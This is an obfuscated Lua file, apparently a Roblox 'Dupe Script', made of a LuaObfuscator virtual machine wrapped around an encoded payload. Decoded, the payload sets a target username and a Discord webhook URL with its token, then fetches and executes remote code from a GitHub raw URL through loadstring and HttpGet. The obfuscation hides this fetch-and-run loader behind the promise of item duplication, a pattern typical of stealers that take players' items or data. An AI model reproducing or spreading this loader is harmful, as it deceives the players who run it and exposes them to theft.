--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v88=v5(v83,v19);v19=nil;return v88;else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/(((1642 -(1523 + 114)) -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v84-(v84%(569 -(367 + 201))) ;else local v85=(929 -(214 + 641 + 72))^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21()local v34=(117 -(32 + 85)) -0 ;local v35;while true do if (v34==(1271 -(226 + 1044))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;return (v37 * 256) + v36 ;end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * 16777216) + (v41 * (160901 -95365)) + (v40 * (469 -213)) + v39 ;end if (v38==(350 -(87 + 194 + 69))) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (184 -(67 + 113)) ;v38=1 + 0 ;end end end local function v24()local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(955 -(802 + (1636 -(998 + 488))))) then if (v48==((0 + 0) -0)) then if (v47==0) then return v49 * 0 ;else v48=1 -0 ;v46=0;end elseif (v48==(1490 + 557)) then return ((v47==(997 -(915 + 82))) and (v49 * ((2 -(1 + 0))/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-(1344 -321) ) * (v46 + (v47/(2^(1239 -(1069 + 118))))) ;end if (v43==((776 -(201 + 571)) -(1140 -(116 + 1022)))) then v48=v20(v45,45 -(99 -75) ,6 + 25 );v49=((v20(v45,56 -24 )==(1 + 0)) and  -(792 -(368 + 249 + 174))) or (3 -2) ;v43=21 -(10 + 8) ;end if (v43==(3 -2)) then v46=1;v47=(v20(v45,443 -((1518 -1102) + 26) ,63 -43 ) * (((3 -2) + 1)^(56 -24))) + v44 ;v43=440 -(145 + 293) ;end if (v43==0) then v44=v23();v45=v23();v43=431 -(44 + 386) ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==(0 + 0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(860 -(814 + 45)) );v18=v18 + v50 ;local v52={};for v67=2 -1 , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53==3) then v60=nil;while true do local v89=0 + 0 ;local v90;while true do if (v89==(0 -0)) then v90=0;while true do if (v90==1) then if (v54==3) then local v109=0;while true do if (v109==(0 -0)) then for v140=1 + 0 ,v23() do v56[v140-(1637 -(1373 + 263)) ]=v28();end return v58;end end end if (v54~=2) then else for v113=1001 -(451 + 549) ,v59 do local v114=0;local v115;local v116;local v117;local v118;local v119;while true do if (v114~=1) then else v117=nil;v118=nil;v114=2;end if (v114==(1 + 1)) then v119=nil;while true do if (v115==1) then v118=nil;v119=nil;v115=2;end if (v115==2) then while true do if (0~=v116) then else local v179=0 -0 ;local v180;while true do if (v179~=(0 -0)) then else v180=1384 -(746 + 638) ;while true do if (v180==(0 + 0)) then local v185=0 -0 ;while true do if (v185~=(342 -(218 + 123))) then else v180=1582 -(1535 + 46) ;break;end if ((0 + 0)~=v185) then else v117=0 + 0 ;v118=nil;v185=561 -(306 + 254) ;end end end if (v180==1) then v116=1;break;end end break;end end end if (v116~=(1 + 0)) then else v119=nil;while true do if (v117~=(0 -0)) then else local v181=0;local v182;local v183;while true do if (v181==(1468 -(899 + 568))) then while true do if (v182~=0) then else v183=0;while true do if (v183~=(1 + 0)) then else v117=2 -1 ;break;end if ((603 -(268 + 335))~=v183) then else v118=v21();v119=nil;v183=291 -(60 + 230) ;end end break;end end break;end if (v181==(572 -(426 + 146))) then v182=0;v183=nil;v181=1;end end end if ((1 + 0)==v117) then if (v118==1) then v119=v21()~=(1456 -(282 + 1174)) ;elseif (v118==2) then v119=v24();elseif (v118~=(814 -(569 + 242))) then else v119=v25();end v60[v113]=v119;break;end end break;end end break;end if (v115==(0 -0)) then local v171=0 + 0 ;while true do if (v171~=1) then else v115=1025 -(706 + 318) ;break;end if (v171==(1251 -(721 + 530))) then v116=1271 -(945 + 326) ;v117=nil;v171=2 -1 ;end end end end break;end if (v114~=(0 + 0)) then else v115=700 -(271 + 429) ;v116=nil;v114=1 + 0 ;end end end v58[3]=v21();for v120=1,v23() do local v121=0;local v122;local v123;while true do if (v121==(1500 -(1408 + 92))) then local v142=1086 -(461 + 625) ;while true do if (v142==(1289 -(993 + 295))) then v121=1 + 0 ;break;end if ((1171 -(418 + 753))==v142) then v122=0;v123=nil;v142=1;end end end if (v121~=1) then else while true do if (v122~=0) then else v123=v21();if (v20(v123,1 + 0 ,1)~=0) then else local v172=0 + 0 ;local v173;local v174;local v175;local v176;local v177;local v178;while true do if (3==v172) then while true do if ((1 + 1)==v173) then v178=nil;while true do if (v174~=2) then else while true do if (v175==2) then local v188=0 + 0 ;while true do if ((530 -(406 + 123))==v188) then v175=3;break;end if (v188==0) then local v198=0;while true do if (v198~=(1770 -(1749 + 20))) then else v188=1;break;end if (v198~=(0 + 0)) then else if (v20(v177,1,1)==1) then v178[1324 -(1249 + 73) ]=v60[v178[1 + 1 ]];end if (v20(v177,1147 -(466 + 679) ,2)~=(2 -1)) then else v178[3]=v60[v178[8 -5 ]];end v198=1;end end end end end if (1~=v175) then else local v189=0;local v190;local v191;while true do if (v189~=1) then else while true do if (v190~=(1900 -(106 + 1794))) then else v191=0 + 0 ;while true do if (v191~=(0 + 0)) then else local v204=0 -0 ;while true do if ((0 -0)~=v204) then else v178={v22(),v22(),nil,nil};if (v176==0) then local v205=114 -(4 + 110) ;while true do if (v205~=(584 -(57 + 527))) then else v178[3]=v22();v178[1431 -(41 + 1386) ]=v22();break;end end elseif (v176==(104 -(17 + 86))) then v178[3]=v23();elseif (v176==2) then v178[3]=v23() -(2^16) ;elseif (v176~=3) then else local v210=0 + 0 ;local v211;local v212;while true do if ((1 -0)~=v210) then else while true do if (v211~=(0 -0)) then else v212=166 -(122 + 44) ;while true do if (v212==(0 -0)) then v178[3]=v23() -(2^16) ;v178[4]=v22();break;end end break;end end break;end if (v210==0) then v211=0 -0 ;v212=nil;v210=1 + 0 ;end end end v204=1 + 0 ;end if ((1 -0)==v204) then v191=66 -(30 + 35) ;break;end end end if (v191~=1) then else v175=2 + 0 ;break;end end break;end end break;end if (v189~=0) then else v190=1257 -(1043 + 214) ;v191=nil;v189=1;end end end if ((0 -0)==v175) then local v192=1212 -(323 + 889) ;local v193;local v194;while true do if (v192~=(0 -0)) then else v193=580 -(361 + 219) ;v194=nil;v192=321 -(53 + 267) ;end if ((1 + 0)~=v192) then else while true do if (v193~=(413 -(15 + 398))) then else v194=982 -(18 + 964) ;while true do if (v194==0) then v176=v20(v123,2,11 -8 );v177=v20(v123,4,4 + 2 );v194=1 + 0 ;end if ((851 -(20 + 830))==v194) then v175=1 + 0 ;break;end end break;end end break;end end end if (v175~=3) then else if (v20(v177,3,129 -(116 + 10) )~=1) then else v178[4]=v60[v178[4]];end v55[v120]=v178;break;end end break;end if ((0 + 0)==v174) then v175=0;v176=nil;v174=1;end if (v174==(739 -(542 + 196))) then local v186=0;local v187;while true do if (v186==(0 -0)) then v187=0;while true do if (v187==(0 + 0)) then local v199=0;while true do if (0~=v199) then else v177=nil;v178=nil;v199=1 + 0 ;end if (v199==(1 + 0)) then v187=1;break;end end end if ((2 -1)==v187) then v174=4 -2 ;break;end end break;end end end end break;end if ((1552 -(1126 + 425))==v173) then v176=nil;v177=nil;v173=407 -(118 + 287) ;end if (v173==(0 -0)) then v174=0;v175=nil;v173=1122 -(118 + 1003) ;end end break;end if (v172~=(0 -0)) then else v173=0;v174=nil;v172=1;end if (v172==1) then v175=nil;v176=nil;v172=2;end if ((379 -(142 + 235))~=v172) then else v177=nil;v178=nil;v172=13 -10 ;end end end break;end end break;end end end v54=1 + 2 ;end break;end if (v90==0) then if (v54~=(978 -(553 + 424))) then else local v111=0 -0 ;while true do if (v111~=(1 + 0)) then else v60={};v54=2 + 0 ;break;end if (v111==0) then v58={v55,v56,nil,v57};v59=v23();v111=1;end end end if (v54~=(0 + 0)) then else local v112=0;while true do if (v112~=(1 + 0)) then else v57={};v54=2 -1 ;break;end if (v112==(0 -0)) then v55={};v56={};v112=2 -1 ;end end end v90=1;end end break;end end end break;end if (v53~=(1 + 1)) then else v58=nil;v59=nil;v53=3;end if (v53~=(4 -3)) then else v56=nil;v57=nil;v53=2;end if (v53~=(753 -(239 + 514))) then else v54=0 + 0 ;v55=nil;v53=1330 -(797 + 532) ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v86=0,v77 do if (v86>=v71) then v75[v86-v71 ]=v76[v86 + 1 ];else v79[v86]=v76[v86 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v87=0;while true do if (v87==0) then v81=v69[v73];v82=v81[1];v87=1;end if (v87==1) then if (v82<=4) then if (v82<=1) then if (v82==0) then v79[v81[2]]=v63[v81[3]];else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=2) then local v100=0;local v101;while true do if (v100==0) then v101=v81[2];v79[v101]=v79[v101](v13(v79,v101 + 1 ,v74));break;end end elseif (v82==3) then do return;end else v79[v81[2]][v81[3]]=v81[4];end elseif (v82<=6) then if (v82==5) then v79[v81[2]]();else local v102=0;local v103;local v104;local v105;local v106;while true do if (v102==0) then v103=v81[2];v104,v105=v72(v79[v103](v13(v79,v103 + 1 ,v81[3])));v102=1;end if (v102==2) then for v137=v103,v74 do v106=v106 + 1 ;v79[v137]=v104[v106];end break;end if (v102==1) then v74=(v105 + v103) -1 ;v106=0;v102=2;end end end elseif (v82<=7) then v79[v81[2]]=v81[3];elseif (v82>8) then local v126=v81[2];local v127=v79[v81[3]];v79[v126 + 1 ]=v127;v79[v126]=v127[v81[4]];else local v131=0;local v132;local v133;while true do if (v131==2) then v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v131=3;end if (v131==1) then v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v131=2;end if (v131==5) then v81=v69[v73];v133=v81[2];v132=v79[v81[3]];v79[v133 + 1 ]=v132;v79[v133]=v132[v81[4]];v131=6;end if (v131==6) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];break;end if (v131==0) then v132=nil;v133=nil;v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v131=1;end if (v131==4) then v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v131=5;end if (v131==3) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v131=4;end end end v73=v73 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365726E616D65030A3O0062656E67616C7031333503073O004875624E616D65030B3O004475706520536372697074030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O313230313539342O3536353733323935342F555A396F5F52623269394D7A6F74787933344F4D6A3555505845376D70365A6F4A6E6F4B534D466649516D2O362D7543425648677A742D66705442384269427A4A422D4A030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C7561000F3O0012083O00013O00304O0002000300124O00013O00304O0004000500124O00013O00304O0006000700124O00083O00122O000100093O00202O00010001000A00122O0003000B4O0001000400014O0006000100044O00025O00022O00053O000100012O00033O00017O00",v9(),...);end
